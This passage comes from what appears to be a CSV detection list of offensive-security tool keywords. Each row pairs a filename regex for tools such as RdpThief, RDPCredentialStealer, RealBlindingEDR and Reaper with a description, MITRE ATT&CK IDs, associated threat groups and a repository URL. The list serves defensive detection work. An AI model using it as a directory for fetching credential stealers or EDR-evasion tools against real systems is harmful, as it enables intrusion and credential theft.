- Yanluowang - menuPass - Unit 
29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","10204" "*/rdcman.py*",".{0,1000}\/rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10205" "*/rdcmanfox.dll*",".{0,1000}\/rdcmanfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","10206" "*/RDE1.git*",".{0,1000}\/RDE1\.git.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","10207" "*/rdll_template*",".{0,1000}\/rdll_template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10208" "*/RDP Recognizer.exe*",".{0,1000}\/RDP\sRecognizer\.exe.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","10209" "*/rdp.py*",".{0,1000}\/rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10210" "*/rdp_brute.git*",".{0,1000}\/rdp_brute\.git.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - 
TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","10211" "*/rdp_check.py*",".{0,1000}\/rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10212" "*/RDPassSpray.git*",".{0,1000}\/RDPassSpray\.git.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","10213" "*/RDPCredentialStealer.git*",".{0,1000}\/RDPCredentialStealer\.git.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10214" "*/RDPCredentialStealer/releases/download/*",".{0,1000}\/RDPCredentialStealer\/releases\/download\/.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10215" "*/RDPCredentialStealer/tarball/latest*",".{0,1000}\/RDPCredentialStealer\/tarball\/latest.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","10216" "*/rdp-enum-encryption.nse*",".{0,1000}\/rdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10217" "*/RDPHook.dll*",".{0,1000}\/RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","10218" "*/RDPKeylog.exe*",".{0,1000}\/RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","10219" "*/RDPMITM.py*",".{0,1000}\/RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10220" "*/rdp-ntlm-info.nse*",".{0,1000}\/rdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10221" "*/rdp-sniffer.cap*",".{0,1000}\/rdp\-sniffer\.cap.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","10226" "*/RdpStrike.git*",".{0,1000}\/RdpStrike\.git.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","1","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","10227" "*/RdpThief*",".{0,1000}RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","10228" "*/RdpThief.cna*",".{0,1000}\/RdpThief\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - 
T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10229" "*/RdpThief.dll*",".{0,1000}\/RdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","10230" "*/RdpThief.git*",".{0,1000}\/RdpThief\.git.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","10231" "*/RdpThief_x64.tmp*",".{0,1000}\/RdpThief_x64\.tmp.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10232" "*/rdpv.exe*",".{0,1000}\/rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","10233" "*/rdp-vuln-ms12-020.nse*",".{0,1000}\/rdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10234" "*/readfile_bof.*",".{0,1000}\/readfile_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","10240" "*/Readfile_BoF/*",".{0,1000}\/Readfile_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","10241" "*/RealBlindingEDR.git*",".{0,1000}\/RealBlindingEDR\.git.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10242" "*/RealBlindingEDR/tarball*",".{0,1000}\/RealBlindingEDR\/tarball.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10243" "*/RealBlindingEDR/zipball*",".{0,1000}\/RealBlindingEDR\/zipball.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","10244" "*/Realistic Format Virus.exe*",".{0,1000}\/Realistic\sFormat\sVirus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10245" "*/realvnc-auth-bypass.nse*",".{0,1000}\/realvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10247" "*/Reaper.git*",".{0,1000}\/Reaper\.git.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10248" "*/Reaper/Reaper.cpp*",".{0,1000}\/Reaper\/Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10249" "*/ReaperX64.zip*",".{0,1000}\/ReaperX64\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","10250" "*/REC2.git*",".{0,1000}\/REC2\.git.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","10251" "*/recaptcha-phish.git*",".{0,1000}\/recaptcha\-phish\.git.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","10252" "*/recaptcha-phish-main*",".{0,1000}\/recaptcha\-phish\-main.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - 
T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","10253" "*/Recon-AD.git*",".{0,1000}\/Recon\-AD\.git.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10254" "*/Recon-AD-AllLocalGroups.dll",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10255" "*/Recon-AD-AllLocalGroups.dll*",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10256" "*/Recon-AD-Computers.dll",".{0,1000}\/Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10257" "*/Recon-AD-Computers.dll*",".{0,1000}\/Recon\-AD\-Computers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10258" "*/Recon-AD-Domain.dll",".{0,1000}\/Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10259" "*/Recon-AD-Domain.dll*",".{0,1000}\/Recon\-AD\-Domain\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10260" "*/Recon-AD-Groups.dll",".{0,1000}\/Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","10261" "*/Recon-AD-Groups.dll*",".{0,1000}\/Recon\-AD\-Groups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10262" "*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 